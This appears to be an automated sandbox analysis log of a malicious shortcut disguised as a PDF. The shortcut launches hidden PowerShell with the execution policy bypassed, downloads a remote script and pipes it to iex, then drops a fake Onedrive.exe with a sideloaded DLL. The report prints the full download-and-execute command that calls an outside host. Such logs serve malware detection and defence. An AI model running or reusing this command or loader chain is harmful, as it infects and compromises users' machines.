Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | Virustotal: Detection: 14%
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | ReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: sppcext.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: winscard.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Section loaded: dpapi.dll
Source: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk | LNK file: ..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp, sppc.dll.2.dr
Source: Binary string: phoneactivate.pdbGCTLG source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: phoneactivate.pdb source: powershell.exe, 00000002.00000002.1859298060.0000025EE8F2C000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Binary string: phoneactivate.pdbGCTL source: Onedrive.exe, 00000004.00000000.1832954156.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe, 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp, Onedrive.exe.2.dr
Source: Onedrive.exe.2.dr | Static PE information: 0xBBFECFD3 [Thu Dec 12 01:52:19 2069 UTC]
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle
Source: Onedrive.exe.2.dr | Static PE information: section name: .imrsiv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B8A4A28 push E95D50BCh; ret 2_2_00007FFD9B8A4AA9
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD32D0B push ds; ret 4_3_000001729DD32D0E
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD38A53 push 2F672291h; retf 4_3_000001729DD38A92
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Code function: 4_3_000001729DD251C3 push FF00009Eh; ret 4_3_000001729DD251C8

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\cmd.exe
Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Onedrive.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\sppc.dll

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.lnk | Static PE information: Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5901
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Window / User API: threadDelayed 9727
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe API coverage: 4.8 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024 Thread sleep count: 256 > 30
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024 Thread sleep time: -256000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024 Thread sleep count: 9727 > 30
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 8024 Thread sleep time: -9727000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AF7470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12, 4_2_00007FFDF3AF7470
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AEB9F0 GetSystemInfo, 4_2_00007FFDF3AEB9F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873360667.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142989813.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C0A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Onedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2873360667.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2142989813.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2465823286.000001729C124000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi
Source: powershell.exe, 00000002.00000002.1858264293.0000025EE8E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AD2830 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FFDF3AD2830
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AD1010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle, 4_2_00007FFDF3AD1010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FF63EA1C7F4 memset,GetProcessHeap,HeapFree, 4_2_00007FF63EA1C7F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FF63EA1EBD0 SetUnhandledExceptionFilter, 4_2_00007FF63EA1EBD0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FF63EA1E8BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF63EA1E8BC
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AD3190 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FFDF3AD3190
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3AEDC60 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FFDF3AEDC60

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Thread register set: 8020 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe Code function: 4_2_00007FFDF3B0E310 cpuid 4_2_00007FFDF3B0E310
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
